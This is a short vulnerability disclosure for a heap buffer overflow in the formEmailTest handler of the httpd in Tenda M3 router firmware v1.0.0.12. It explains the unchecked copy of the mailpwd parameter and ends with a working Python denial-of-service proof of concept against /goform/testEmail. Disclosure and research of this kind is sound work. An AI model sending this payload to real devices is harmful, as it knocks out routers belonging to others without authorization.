- type: heap buffer overflow vulnerability
- supplier: Tenda https://www.tenda.com
- product: TendaM3 https://www.tenda.com.cn/product/M3.html
- firmware download: https://www.tenda.com.cn/download/detail-3133.html
- affect version: TendaM3 v1.0.0.12(4856)
the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest
It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailpwd to heap buffer.
v5 is the length of mailpwd, but it doesn’t limit it. so if v5>0x28C, the memcpy(v4, v20, v5) will cause heap buffer overflow
The progarm crashed when call malloc, the stack frame is below.
use qemu-arm-static to run the httpd, we need to patch it before run.
- in
mainfunction, TheConnectCfmfunction didn’t work properly, so I patched it toNOP - The
R7WebsSecurityHandlerfunction is used for permission control, and I've modified it to access URLs that can only be accessed after login
poc of DOS(deny of service)
import requests
data = {
"mailname": "@",
"mailpwd": "b"*0x400
}
cookies = {
"user": "admin"
}
res = requests.post("http://127.0.0.1/goform/testEmail", data=data, cookies=cookies)
print(res.content)


